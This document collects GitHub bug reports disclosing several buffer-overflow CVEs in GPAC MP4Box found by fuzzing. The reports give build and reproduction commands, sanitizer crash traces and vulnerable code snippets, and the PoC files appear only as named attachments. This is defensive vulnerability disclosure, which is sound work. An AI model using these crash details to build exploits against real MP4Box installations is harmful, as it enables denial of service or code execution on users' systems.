GPAC MP4box 2.1-DEV-rev649-ga8f438d20 is vulnerable to buffer overflow in h263dmx_process filters/reframe_h263.c:609

*   I looked for a similar issue and couldn't find any.
*   I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/
*   I give enough information for contributors to reproduce my issue (meaningful title, github labels,

**Description**

buffer overflow in h263dmx\_process filters/reframe\_h263.c:609

**Version info**

latest version atm

    MP4Box - GPAC version 2.1-DEV-rev649-ga8f438d20-master
    (c) 2000-2022 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io
    
    Please cite our work in your research:
    	GPAC Filters: https://doi.org/10.1145/3339825.3394929
    	GPAC: https://doi.org/10.1145/1291233.1291452
    
    GPAC Configuration: --enable-sanitizer
    Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SSL GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_LINUX_DVB  GPAC_DISABLE_3D
    

**Reproduce**

compile and run

    ./configure --enable-sanitizer
    make
    ./MP4Box import -cat poc_bof13.mp4
    

Crash reported by sanitizer

    [H263Dmx] garbage before first frame!
    Track Importing H263 - Width 704 Height 576 FPS 15000/1000
    =================================================================
    ==735609==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60e000000620 at pc 0x7ff71222b397 bp 0x7ffeaf3c2280 sp 0x7ffeaf3c1a28
    READ of size 4294967295 at 0x60e000000620 thread T0
        #0 0x7ff71222b396 in __interceptor_memcpy ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:827
        #1 0x7ff70fbae101 in memcpy /usr/include/x86_64-linux-gnu/bits/string_fortified.h:29
        #2 0x7ff70fbae101 in h263dmx_process filters/reframe_h263.c:609
        #3 0x7ff70f7a6f1d in gf_filter_process_task filter_core/filter.c:2815
        #4 0x7ff70f7665a3 in gf_fs_thread_proc filter_core/filter_session.c:1859
        #5 0x7ff70f772ece in gf_fs_run filter_core/filter_session.c:2120
        #6 0x7ff70f1b59c1 in gf_media_import media_tools/media_import.c:1551
        #7 0x5617e36bfb4c in import_file /home/sumuchuan/Desktop/gpac_fuzz/gpac/applications/mp4box/fileimport.c:1498
        #8 0x5617e36ca5d7 in cat_isomedia_file /home/sumuchuan/Desktop/gpac_fuzz/gpac/applications/mp4box/fileimport.c:2536
        #9 0x5617e3674130 in do_add_cat /home/sumuchuan/Desktop/gpac_fuzz/gpac/applications/mp4box/mp4box.c:4562
        #10 0x5617e3674130 in mp4box_main /home/sumuchuan/Desktop/gpac_fuzz/gpac/applications/mp4box/mp4box.c:6124
        #11 0x7ff70c73cd8f in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58
        #12 0x7ff70c73ce3f in __libc_start_main_impl ../csu/libc-start.c:392
        #13 0x5617e3650cb4 in _start (/home/sumuchuan/Desktop/gpac_fuzz/gpac/bin/gcc/MP4Box+0xabcb4)
    
    0x60e000000620 is located 0 bytes to the right of 160-byte region [0x60e000000580,0x60e000000620)
    allocated by thread T0 here:
        #0 0x7ff7122a5867 in __interceptor_malloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:145
        #1 0x7ff70f7b4528 in gf_filter_parse_args filter_core/filter.c:2033
        #2 0x7ff70f7b5234 in gf_filter_new_finalize filter_core/filter.c:510
        #3 0x7ff70f7b65d7 in gf_filter_new filter_core/filter.c:439
        #4 0x7ff70f7021c7 in gf_filter_pid_resolve_link_internal filter_core/filter_pid.c:3611
        #5 0x7ff70f7258b2 in gf_filter_pid_resolve_link_check_loaded filter_core/filter_pid.c:3711
        #6 0x7ff70f7258b2 in gf_filter_pid_init_task filter_core/filter_pid.c:4883
        #7 0x7ff70f7665a3 in gf_fs_thread_proc filter_core/filter_session.c:1859
        #8 0x7ff70f772ece in gf_fs_run filter_core/filter_session.c:2120
        #9 0x7ff70f1b59c1 in gf_media_import media_tools/media_import.c:1551
        #10 0x5617e36bfb4c in import_file /home/sumuchuan/Desktop/gpac_fuzz/gpac/applications/mp4box/fileimport.c:1498
        #11 0x5617e36ca5d7 in cat_isomedia_file /home/sumuchuan/Desktop/gpac_fuzz/gpac/applications/mp4box/fileimport.c:2536
        #12 0x5617e3674130 in do_add_cat /home/sumuchuan/Desktop/gpac_fuzz/gpac/applications/mp4box/mp4box.c:4562
        #13 0x5617e3674130 in mp4box_main /home/sumuchuan/Desktop/gpac_fuzz/gpac/applications/mp4box/mp4box.c:6124
        #14 0x7ff70c73cd8f in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:827 in __interceptor_memcpy
    Shadow bytes around the buggy address:
      0x0c1c7fff8070: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
      0x0c1c7fff8080: 00 00 00 00 00 00 00 00 00 00 00 fa fa fa fa fa
      0x0c1c7fff8090: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c1c7fff80a0: 00 00 00 00 00 00 00 fa fa fa fa fa fa fa fa fa
      0x0c1c7fff80b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    =>0x0c1c7fff80c0: 00 00 00 00[fa]fa fa fa fa fa fa fa 00 00 00 00
      0x0c1c7fff80d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c1c7fff80e0: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
      0x0c1c7fff80f0: 00 00 00 00 00 00 00 00 00 00 00 fa fa fa fa fa
      0x0c1c7fff8100: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c1c7fff8110: 00 00 00 00 00 00 00 fa fa fa fa fa fa fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==735609==ABORTING
    

Looks like the oob read happens in filters/reframe\_h263.c

    READ of size 4294967295 at 0x60e000000620 thread T0
       #0 0x7ff71222b396 in __interceptor_memcpy 
       ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:827
       #1 0x7ff70fbae101 in memcpy /usr/include/x86_64-linux-gnu/bits/string_fortified.h:29
       #2 0x7ff70fbae101 in h263dmx_process filters/reframe_h263.c:609
    

if compile without ASAN and run the same poc

    ./configure --static-bin
    make
    ./MP4Box import -cat poc_bof13.mp4
    

there will be segment fault

    [H263Dmx] garbage before first frame!
    Track Importing H263 - Width 704 Height 576 FPS 15000/1000
    Segmentation fault=          | (50/100)
    

backtrace atm

    pwndbg> bt
    #0  0x0000000000afc1cc in __memmove_avx_unaligned_erms ()
    #1  0x00000000007f0dbf in h263dmx_process ()
    #2  0x00000000006d9c90 in gf_filter_process_task ()
    #3  0x00000000006c5dbc in gf_fs_thread_proc ()
    #4  0x00000000006cb3bb in gf_fs_run ()
    #5  0x00000000006008ed in gf_media_import ()
    #6  0x00000000004313d1 in import_file ()
    #7  0x00000000004375f1 in cat_isomedia_file ()
    #8  0x0000000000411e78 in mp4box_main ()
    #9  0x0000000000a8c47a in __libc_start_call_main ()
    #10 0x0000000000a8dcd7 in __libc_start_main_impl ()
    #11 0x0000000000402c55 in _start ()
    

**POC**

poc\_bof13.zip

**Impact**

Potentially causing DoS and RCE

**Credit**

Xdchase

CVE-2022-47663: buffer overflow in h263dmx_process filters/reframe_h263.c:609 · Issue #2360 · gpac/gpac

GPAC MP4Box 2.1-DEV-rev644-g5c4df2a67 is vulnerable to buffer overflow in function gf_hevc_read_vps_bs_internal of media_tools/av_parsers.c:8039

Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you!

buffer overflow in function gf\_hevc\_read\_vps\_bs\_internal of media\_tools/av\_parsers.c:8039

    MP4Box - GPAC version 2.1-DEV-rev644-g5c4df2a67-master
    (c) 2000-2022 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io
    
    Please cite our work in your research:
    	GPAC Filters: https://doi.org/10.1145/3339825.3394929
    	GPAC: https://doi.org/10.1145/1291233.1291452
    
    GPAC Configuration: --enable-sanitizer
    Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SSL GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_LINUX_DVB  GPAC_DISABLE_3D
    

    ./configure --enable-sanitizer
    make
    ./MP4Box import -cat poc_bof10.mp4
    

    [Core] exp-golomb read failed, not enough bits in bitstream !
    [HEVC] Error parsing NAL unit type 33
    [HEVC] Error parsing Sequence Param Set
    [HEVC] Error parsing NAL unit type 32
    [HEVC] 8 layers in VPS but only 4 supported in GPAC
    [HEVC] Error parsing NAL unit type 32
    [HEVC] Error parsing Video Param Set
    [HEVC] Error parsing NAL unit type 33
    Track Importing HEVC - Width 1 Height 6 FPS 488447261/488447261
    [HEVC] Error parsing NAL unit type 390)
    [HEVC] SEI user message type 249 size error (109 but 15 remain), skipping SEI message
    media_tools/av_parsers.c:8039:32: runtime error: index 4 out of bounds for type 'u8 [4]'

CVE-2022-47658: buffer overflow in function gf_hevc_read_vps_bs_internal of media_tools/av_parsers.c:8039 · Issue #2356 · gpac/gpac

GPAC MP4box 2.1-DEV-rev617-g85ce76efd is vulnerable to Buffer Overflow in gf_hevc_read_sps_bs_internal function of media_tools/av_parsers.c:8273

Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you!

buffer overflow in gf\_hevc\_read\_sps\_bs\_internal function of media\_tools/av\_parsers.c:8273

    MP4Box - GPAC version 2.1-DEV-rev617-g85ce76efd-master
    (c) 2000-2022 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io
    
    Please cite our work in your research:
    	GPAC Filters: https://doi.org/10.1145/3339825.3394929
    	GPAC: https://doi.org/10.1145/1291233.1291452
    
    GPAC Configuration: --enable-sanitizer
    Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SSL GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_LINUX_DVB  GPAC_DISABLE_3D
    

    ./configure --enable-sanitizer
    make
    ./MP4Box import -cat poc_bof9.mp4
    

    [HEVC] Error parsing NAL unit type 33
    [HEVC] Error parsing Sequence Param Set
    [HEVC] Error parsing NAL unit type 33
    [HEVC] Error parsing Sequence Param Set
    media_tools/av_parsers.c:8273:32: runtime error: index 159 out of bounds for type 'HEVC_RepFormat [16]'

CVE-2022-47656: buffer overflow in gf_hevc_read_sps_bs_internal function of media_tools/av_parsers.c:8273 · Issue #2353 · gpac/gpac

GPAC MP4box 2.1-DEV-rev644-g5c4df2a67 is vulnerable to Buffer Overflow in gf_bs_read_data

Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you!

*   I looked for a similar issue and couldn't find any.
*   I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/
*   I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop\_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95

Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/

**Description**

stack-buffer-overflow utils/bitstream.c:732 in gf\_bs\_read\_data

**Version info**

latest version atm

    MP4Box - GPAC version 2.1-DEV-rev644-g5c4df2a67-master
    (c) 2000-2022 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io
    
    Please cite our work in your research:
    	GPAC Filters: https://doi.org/10.1145/3339825.3394929
    	GPAC: https://doi.org/10.1145/1291233.1291452
    
    GPAC Configuration: --enable-sanitizer
    Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SSL GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_LINUX_DVB  GPAC_DISABLE_3D
    

**Reproduce**

compile and run

    ./configure --enable-sanitizer
    make
    ./MP4Box import -cat poc_bof11.mp4
    

Crash reported by sanitizer

    Track Importing AAC  - SampleRate 88200 Num Channels 8
    =================================================================
    ==325854==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffc52ec0940 at pc 0x7fa1e477c501 bp 0x7ffc52ebf3a0 sp 0x7ffc52ebf390
    WRITE of size 1 at 0x7ffc52ec0940 thread T0
        #0 0x7fa1e477c500 in gf_bs_read_data utils/bitstream.c:732
        #1 0x7fa1e59d0a8c in latm_dmx_sync_frame_bs filters/reframe_latm.c:170
        #2 0x7fa1e59d289f in latm_dmx_sync_frame_bs filters/reframe_latm.c:86
        #3 0x7fa1e59d289f in latm_dmx_process filters/reframe_latm.c:526
        #4 0x7fa1e55eabac in gf_filter_process_task filter_core/filter.c:2795
        #5 0x7fa1e55aa703 in gf_fs_thread_proc filter_core/filter_session.c:1859
        #6 0x7fa1e55b700e in gf_fs_run filter_core/filter_session.c:2120
        #7 0x7fa1e4ff9a21 in gf_media_import media_tools/media_import.c:1551
        #8 0x55a84c1ccb4c in import_file /home/sumuchuan/Desktop/gpac_fuzz/gpac/applications/mp4box/fileimport.c:1498
        #9 0x55a84c1d75d7 in cat_isomedia_file /home/sumuchuan/Desktop/gpac_fuzz/gpac/applications/mp4box/fileimport.c:2536
        #10 0x55a84c181130 in do_add_cat /home/sumuchuan/Desktop/gpac_fuzz/gpac/applications/mp4box/mp4box.c:4562
        #11 0x55a84c181130 in mp4box_main /home/sumuchuan/Desktop/gpac_fuzz/gpac/applications/mp4box/mp4box.c:6124
        #12 0x7fa1e2580d8f in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58
        #13 0x7fa1e2580e3f in __libc_start_main_impl ../csu/libc-start.c:392
        #14 0x55a84c15dcb4 in _start (/home/sumuchuan/Desktop/gpac_fuzz/gpac/bin/gcc/MP4Box+0xabcb4)
    
    Address 0x7ffc52ec0940 is located in stack of thread T0 at offset 5088 in frame
        #0 0x7fa1e59d20af in latm_dmx_process filters/reframe_latm.c:456
    
      This frame has 19 object(s):
        [48, 52) 'pck_size' (line 461)
        [64, 68) 'latm_frame_size' (line 525)
        [80, 84) 'dsi_s' (line 312)
        [96, 104) 'output' (line 460)
        [128, 136) 'dsi_b' (line 311)
        [160, 184) '<unknown>'
        [224, 248) '<unknown>'
        [288, 312) '<unknown>'
        [352, 376) '<unknown>'
        [416, 440) '<unknown>'
        [480, 504) '<unknown>'
        [544, 568) '<unknown>'
        [608, 632) '<unknown>'
        [672, 696) '<unknown>'
        [736, 760) '<unknown>'
        [800, 824) '<unknown>'
        [864, 888) '<unknown>'
        [928, 952) '<unknown>'
        [992, 5088) 'latm_buffer' (line 524) <== Memory access at offset 5088 overflows this variable
    HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork
          (longjmp and C++ exceptions *are* supported)
    SUMMARY: AddressSanitizer: stack-buffer-overflow utils/bitstream.c:732 in gf_bs_read_data
    Shadow bytes around the buggy address:
      0x10000a5d00d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10000a5d00e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10000a5d00f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10000a5d0100: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10000a5d0110: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    =>0x10000a5d0120: 00 00 00 00 00 00 00 00[f3]f3 f3 f3 f3 f3 f3 f3
      0x10000a5d0130: f3 f3 f3 f3 f3 f3 f3 f3 00 00 00 00 00 00 00 00
      0x10000a5d0140: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10000a5d0150: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10000a5d0160: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10000a5d0170: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==325854==ABORTING
    

**POC**

poc\_bof11.zip

**Impact**

Potentially causing DoS and RCE

**Credit**

Xdchase

CVE-2022-47659: stack-buffer-overflow utils/bitstream.c:732 in gf_bs_read_data · Issue #2354 · gpac/gpac

GPAC MP4box 2.1-DEV-rev593-g007bf61a0 is vulnerable to Buffer Overflow in gf_hevc_read_sps_bs_internal function of media_tools/av_parsers.c:8261

Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you!

*   I looked for a similar issue and couldn't find any.
*   I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/
*   I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop\_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95

Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/

**Description**

buffer overflow in gf\_hevc\_read\_sps\_bs\_internal function of media\_tools/av\_parsers.c:8261

	//sps\_rep\_format\_idx = 0;
	if (multiLayerExtSpsFlag) {
		sps->update\_rep\_format\_flag = gf\_bs\_read\_int\_log(bs, 1, "update\_rep\_format\_flag");
		if (sps->update\_rep\_format\_flag) {
			sps->rep\_format\_idx = gf\_bs\_read\_int\_log(bs, 8, "rep\_format\_idx");
			if (sps->rep\_format\_idx\>15) {
				return -1;
			}
		} else {
			sps->rep\_format\_idx = vps->rep\_format\_idx\[layer\_id\]; // overflow
		}

**Version info**

latest version

    MP4Box - GPAC version 2.1-DEV-rev593-g007bf61a0-master
    (c) 2000-2022 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io
    
    Please cite our work in your research:
    	GPAC Filters: https://doi.org/10.1145/3339825.3394929
    	GPAC: https://doi.org/10.1145/1291233.1291452
    
    GPAC Configuration: --enable-sanitizer
    Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SSL GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_LINUX_DVB  GPAC_DISABLE_3D
    

**Reproduce**

compile and run

    ./configure --enable-sanitizer
    make
    ./MP4Box import -add poc_bof8.mov
    

Crash reported by sanitizer

    [iso file] Unknown box type dvbs in parent stsd
    [HEVC] Error parsing NAL unit type 16
    [Core] exp-golomb read failed, not enough bits in bitstream !
    [HEVC] Error parsing NAL unit type 32
    [Core] exp-golomb read failed, not enough bits in bitstream !
    [HEVC] Error parsing NAL unit type 33
    [HEVC] Error parsing NAL unit type 16
    Track Importing HEVC - Width -10 Height -20316159 FPS 25000/1000
    [HEVC] Error parsing NAL Unit 8 (size 0 type 0 frame 0 last POC 0) - skipping
    [HEVC] Error parsing NAL unit type 16
    [HEVC] Error parsing NAL unit type 0
    [Core] exp-golomb read failed, not enough bits in bitstream !
    [HEVC] Error parsing NAL unit type 32
    [Core] exp-golomb read failed, not enough bits in bitstream !
    [HEVC] Error parsing NAL unit type 33
    [Core] exp-golomb read failed, not enough bits in bitstream !
    [HEVC] Error parsing NAL unit type 34
    [Core] exp-golomb read failed, not enough bits in bitstream !
    [Core] exp-golomb read failed, not enough bits in bitstream !
    [HEVC] Wrong number of layer sets in VPS 5
    [HEVC] Error parsing NAL unit type 32
    [HEVC] Error parsing Video Param Set
    [Core] exp-golomb read failed, not enough bits in bitstream !
    [HEVC] Error parsing NAL unit type 32
    [Core] exp-golomb read failed, not enough bits in bitstream !
    [HEVC] Error parsing NAL unit type 33
    [Core] exp-golomb read failed, not enough bits in bitstream !
    [Core] exp-golomb read failed, not enough bits in bitstream !
    [Core] exp-golomb read failed, not enough bits in bitstream !
    [HEVC] Error parsing NAL unit type 34
    [Core] exp-golomb read failed, not enough bits in bitstream !
    [Core] exp-golomb read failed, not enough bits in bitstream !
    [Core] exp-golomb read failed, not enough bits in bitstream !
    [HEVC] Error parsing NAL unit type 34
    [Core] exp-golomb read failed, not enough bits in bitstream !
    [Core] exp-golomb read failed, not enough bits in bitstream !
    [Core] exp-golomb read failed, not enough bits in bitstream !
    [Core] exp-golomb read failed, not enough bits in bitstream !
    [HEVC] sorry, 11 layers in VPS but only 4 supported
    [HEVC] Error parsing NAL unit type 32
    [HEVC] Error parsing Video Param Set
    media_tools/av_parsers.c:8261:45: runtime error: index 45 out of bounds for type 'u32 [16]'
    

**POC**

poc\_bof8.zip

**Impact**

Potentially causing DoS and RCE

**Credit**

Xdchase

CVE-2022-47654: buffer overflow in gf_hevc_read_sps_bs_internal function of media_tools/av_parsers.c:8261 · Issue #2350 · gpac/gpac

GPAC MP4box 2.1-DEV-rev593-g007bf61a0 is vulnerable to Buffer Overflow in eac3_update_channels function of media_tools/av_parsers.c:9113

Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you!

*   I looked for a similar issue and couldn't find any.
*   I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/
*   I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop\_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95

Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/

**Description**

buffer overflow in eac3\_update\_channels function of media\_tools/av\_parsers.c:9113

static void eac3\_update\_channels(GF\_AC3Config \*hdr)
{
	u32 i;
	for (i=0; i<hdr->nb\_streams; i++) {
		u32 nb\_ch = ac3\_mod\_to\_total\_chans\[hdr->streams\[i\].acmod\]; // overflow
		if (hdr->streams\[i\].nb\_dep\_sub) {
			hdr->streams\[i\].chan\_loc = eac3\_chanmap\_to\_chan\_loc(hdr->streams\[i\].chan\_loc);
			nb\_ch += gf\_eac3\_get\_chan\_loc\_count(hdr->streams\[i\].chan\_loc);
		}
		if (hdr->streams\[i\].lfon) nb\_ch++;
		hdr->streams\[i\].channels = nb\_ch;
		hdr->streams\[i\].surround\_channels = ac3\_mod\_to\_surround\_chans\[hdr->streams\[i\].acmod\];
	}
}

**Version info**

latest version

    MP4Box - GPAC version 2.1-DEV-rev593-g007bf61a0-master
    (c) 2000-2022 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io
    
    Please cite our work in your research:
    	GPAC Filters: https://doi.org/10.1145/3339825.3394929
    	GPAC: https://doi.org/10.1145/1291233.1291452
    
    GPAC Configuration: --enable-sanitizer
    Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SSL GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_LINUX_DVB  GPAC_DISABLE_3D
    

**Reproduce**

compile and run

    ./configure --enable-sanitizer
    make
    ./MP4Box import -add poc_bof7.swf
    

Crash reported by sanitizer

    [iso file] Unknown box type dvbs in parent stsd
    Track Importing EAC-3 - SampleRate 32000 Num Channels 6
    [AC3Dmx] 24 bytes unrecovered before sync word
    [AC3Dmx] 13 bytes unrecovered before sync word
    media_tools/av_parsers.c:9113:50: runtime error: index 8 out of bounds for type 'GF_AC3StreamInfo [8]'
    

**POC**

poc\_bof7.zip

**Impact**

Potentially causing DoS and RCE

**Credit**

Xdchase

CVE-2022-47653: buffer overflow in eac3_update_channels function of media_tools/av_parsers.c:9113 · Issue #2349 · gpac/gpac

GPAC MP4Box 2.1-DEV-rev649-ga8f438d20 is vulnerable to Buffer Overflow via media_tools/av_parsers.c:4988 in gf_media_nalu_add_emulation_bytes

*   I looked for a similar issue and couldn't find any.
*   I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/
*   I give enough information for contributors to reproduce my issue (meaningful title, github labels,

**Description**

heap-buffer-overflow media\_tools/av\_parsers.c:4988 in gf\_media\_nalu\_add\_emulation\_bytes

**Version info**

latest version atm

    MP4Box - GPAC version 2.1-DEV-rev649-ga8f438d20-master
    (c) 2000-2022 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io
    
    Please cite our work in your research:
    	GPAC Filters: https://doi.org/10.1145/3339825.3394929
    	GPAC: https://doi.org/10.1145/1291233.1291452
    
    GPAC Configuration: --enable-sanitizer
    Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SSL GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_LINUX_DVB  GPAC_DISABLE_3D
    

**Reproduce**

compile and run

    ./configure --enable-sanitizer
    make
    ./MP4Box import -catx poc_bof14.mp4
    

Crash reported by sanitizer

    [AVC|H264] Error parsing NAL unit type 8
    [AVC|H264] Error parsing Picture Param Set
    [avc-h264] SEI user message type 71 size error (71 but 27 remain), keeping full SEI untouched
    [AVC|H264] Error parsing NAL unit type 8
    [AVC|H264] Error parsing Picture Param Set
    [AVC|H264] Error parsing NAL unit type 8
    [AVC|H264] Error parsing Picture Param Set
    [avc-h264] SEI user message has less than 2 bytes remaining but no end of sei found
    =================================================================
    ==745696==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x615000014780 at pc 0x7f373f26d683 bp 0x7ffd5a01c290 sp 0x7ffd5a01c280
    WRITE of size 1 at 0x615000014780 thread T0
        #0 0x7f373f26d682 in gf_media_nalu_add_emulation_bytes media_tools/av_parsers.c:4988
        #1 0x7f373f26d682 in gf_avc_reformat_sei media_tools/av_parsers.c:6355
        #2 0x7f373fccee25 in naludmx_push_prefix filters/reframe_nalu.c:2398
        #3 0x7f373fcee8ac in naludmx_parse_nal_avc filters/reframe_nalu.c:2821
        #4 0x7f373fcee8ac in naludmx_process filters/reframe_nalu.c:3333
        #5 0x7f373f8a5f1d in gf_filter_process_task filter_core/filter.c:2815
        #6 0x7f373f8655a3 in gf_fs_thread_proc filter_core/filter_session.c:1859
        #7 0x7f373f871ece in gf_fs_run filter_core/filter_session.c:2120
        #8 0x7f373f2b49c1 in gf_media_import media_tools/media_import.c:1551
        #9 0x55b1ec0f1b4c in import_file /home/sumuchuan/Desktop/gpac_fuzz/gpac/applications/mp4box/fileimport.c:1498
        #10 0x55b1ec0fc5d7 in cat_isomedia_file /home/sumuchuan/Desktop/gpac_fuzz/gpac/applications/mp4box/fileimport.c:2536
        #11 0x55b1ec0a6130 in do_add_cat /home/sumuchuan/Desktop/gpac_fuzz/gpac/applications/mp4box/mp4box.c:4562
        #12 0x55b1ec0a6130 in mp4box_main /home/sumuchuan/Desktop/gpac_fuzz/gpac/applications/mp4box/mp4box.c:6124
        #13 0x7f373c83bd8f in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58
        #14 0x7f373c83be3f in __libc_start_main_impl ../csu/libc-start.c:392
        #15 0x55b1ec082cb4 in _start (/home/sumuchuan/Desktop/gpac_fuzz/gpac/bin/gcc/MP4Box+0xabcb4)
    
    0x615000014780 is located 0 bytes to the right of 512-byte region [0x615000014580,0x615000014780)
    allocated by thread T0 here:
        #0 0x7f37423a4867 in __interceptor_malloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:145
        #1 0x7f373ea2c72a in gf_bs_new utils/bitstream.c:154
        #2 0x7f373f26c993 in gf_avc_reformat_sei media_tools/av_parsers.c:6227
        #3 0x7f373fccee25 in naludmx_push_prefix filters/reframe_nalu.c:2398
        #4 0x7f373fcee8ac in naludmx_parse_nal_avc filters/reframe_nalu.c:2821
        #5 0x7f373fcee8ac in naludmx_process filters/reframe_nalu.c:3333
        #6 0x7f373f8a5f1d in gf_filter_process_task filter_core/filter.c:2815
        #7 0x7f373f8655a3 in gf_fs_thread_proc filter_core/filter_session.c:1859
        #8 0x7f373f871ece in gf_fs_run filter_core/filter_session.c:2120
        #9 0x7f373f2b49c1 in gf_media_import media_tools/media_import.c:1551
        #10 0x55b1ec0f1b4c in import_file /home/sumuchuan/Desktop/gpac_fuzz/gpac/applications/mp4box/fileimport.c:1498
        #11 0x55b1ec0fc5d7 in cat_isomedia_file /home/sumuchuan/Desktop/gpac_fuzz/gpac/applications/mp4box/fileimport.c:2536
        #12 0x55b1ec0a6130 in do_add_cat /home/sumuchuan/Desktop/gpac_fuzz/gpac/applications/mp4box/mp4box.c:4562
        #13 0x55b1ec0a6130 in mp4box_main /home/sumuchuan/Desktop/gpac_fuzz/gpac/applications/mp4box/mp4box.c:6124
        #14 0x7f373c83bd8f in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow media_tools/av_parsers.c:4988 in gf_media_nalu_add_emulation_bytes
    Shadow bytes around the buggy address:
      0x0c2a7fffa8a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
